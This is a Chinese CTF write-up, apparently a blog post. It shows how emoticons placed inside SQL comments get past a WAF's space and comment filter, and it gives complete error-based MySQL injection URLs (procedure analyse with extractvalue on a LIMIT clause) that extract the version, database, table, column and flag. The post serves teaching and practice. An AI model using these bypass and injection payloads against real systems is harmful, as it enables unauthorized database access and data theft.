mysql利用颜表情绕过waf注入

如今连sql注入都开始卖萌了 <(▰˘◡˘▰)>
例子:
http://sql.sycsec.com/d07127c7c9267637d554c3f79e1ee203/?lalala=1

我们用普通的方式去尝试注入:
(1)http://sql.sycsec.com/d07127c7c9267637d554c3f79e1ee203/?lalala=1 and 1=1 #
页面显示:
Undeclared variable: 1and1

(2)http://sql.sycsec.com/d07127c7c9267637d554c3f79e1ee203/lalala=1/**/and/**/1=1/**/#

页面显示:
Undeclared variable: 1and1

看来后台把空格还有普通的注释都给过滤了,我又想到/**/之间可以随便加东西的,于是我就加了:颜表情
于是我这样注入:
http://sql.sycsec.com/d07127c7c9267637d554c3f79e1ee203/?lalala=1'/*(。☉౪ ⊙。)*/and/*(/TДT)/*/1=1
然后看页面:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''/*(。☉౪⊙。)*/and/*(/TДT)/*/1=1' at line 1
居然就这样绕过了那个防火墙,难道防火墙是强行让我们卖萌?简直了
(╬ ̄皿 ̄)凸

然后我们继续注入,我经过不断的尝试,尝试过程略 ㄟ( ▔, ▔ )ㄏ

最后我敏感的察觉到后端的查询语句是类似于这样构造的:
SELECT * FROM user WHERE id >0 ORDER BY id LIMIT 1, 1

lalala传递进去的参数是接到了最后面,也就是我打下划线红字加粗的部分

于是我在谷歌里面搜索到这种注入的方法:
SELECT field FROM user WHERE id >0 ORDER BY id LIMIT 1,1
procedure analyse(extractvalue(rand(),concat(0x3a,version())),1);

【1】于是我爆数据库的版本:

http://sql.sycsec.com/d07127c7c9267637d554c3f79e1ee203/?lalala=1/* (╯‵□′)╯︵┻━┻*/procedure/* (╯‵□′)╯︵┻━┻*/analyse(extractvalue(rand(),concat(0x3a,version())),1)
页面报错:

XPATH syntax error: ':5.5.18.1-log'

数据库名字:
http://sql.sycsec.com/d07127c7c9267637d554c3f79e1ee203/?lalala=1/* (/TДT)/ */procedure/* (* ̄∇ ̄*)*/analyse(extractvalue(rand(),concat(0x3a,database())),1)/* (* ̄∇ ̄*)*/
页面报错:

XPATH syntax error: ':rgvk8278b4utx6ei'

表名:
http://sql.sycsec.com/d07127c7c9267637d554c3f79e1ee203/?lalala=1/*(●'◡'●)ノ♥ */procedure/* ∑(っ °Д °;)っ*/analyse(extractvalue(rand(),concat(0x3a,(select/*( ̄工 ̄lll)*/table_name/* (* ̄∇ ̄*)*/from/* (* ̄∇ ̄*)*/information_schema.tables/*(* ̄∇ ̄*)*/where/*o(*≧▽≦)ツ┏━┓*/table_schema=0x7267766b383237386234757478366569/* (* ̄∇ ̄*)*/limit/* (* ̄∇ ̄*)*/0,1))),1)

页面报错:

XPATH syntax error: ':#flag_this'


字段名:
http://sql.sycsec.com/d07127c7c9267637d554c3f79e1ee203/?lalala=1/*ヾ(=^▽^=)ノ*/procedure/* (* ̄∇ ̄*)*/analyse(extractvalue(rand(),concat(0x3a,(select/*(* ̄∇ ̄*)*/COLUMN_NAME/*(* ̄∇ ̄*)*/from/*(* ̄∇ ̄*)*/Information_schema.columns/*(/= _ =)/~┴┴*/where/*(┙>∧<)┙へ┻┻*/table_Name =0x23666c61675f74686973/*ㄟ( ▔, ▔ )ㄏ*/and/*(* ̄∇ ̄*)*/TABLE_SCHEMA=0x7267766b383237386234757478366569/*(* ̄∇ ̄*)*/limit/*(* ̄∇ ̄*)*/1,1))),1)

报错页面:
XPATH syntax error: ':flag'

爆数据:
这里有一点注意的地方,由于表名是#flag_this 里面有#,如果之间丢进去,那么mysql会将其当做注释,我们应该如此处理才好:
`%23flag_this ` 其中“`”这个符号是键盘上Tab上面Esc下面的那个符号

我们这样爆数据:

http://sql.sycsec.com/d07127c7c9267637d554c3f79e1ee203/?lalala=1/*(╯-_-)╯╧╧ */procedure/* ∑(っ °Д °;)っ*/analyse(extractvalue(rand(),concat(0x3a,(select/*(/"≡ _ ≡)/~┴┴*/flag/* (→_→)*/from/* (≖ ‿ ≖)✧*/`%23flag_this`))),1)

报错页面是:

XPATH syntax error: ':SYC{S0_Happy_Y0u_ar3_0rz}'
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值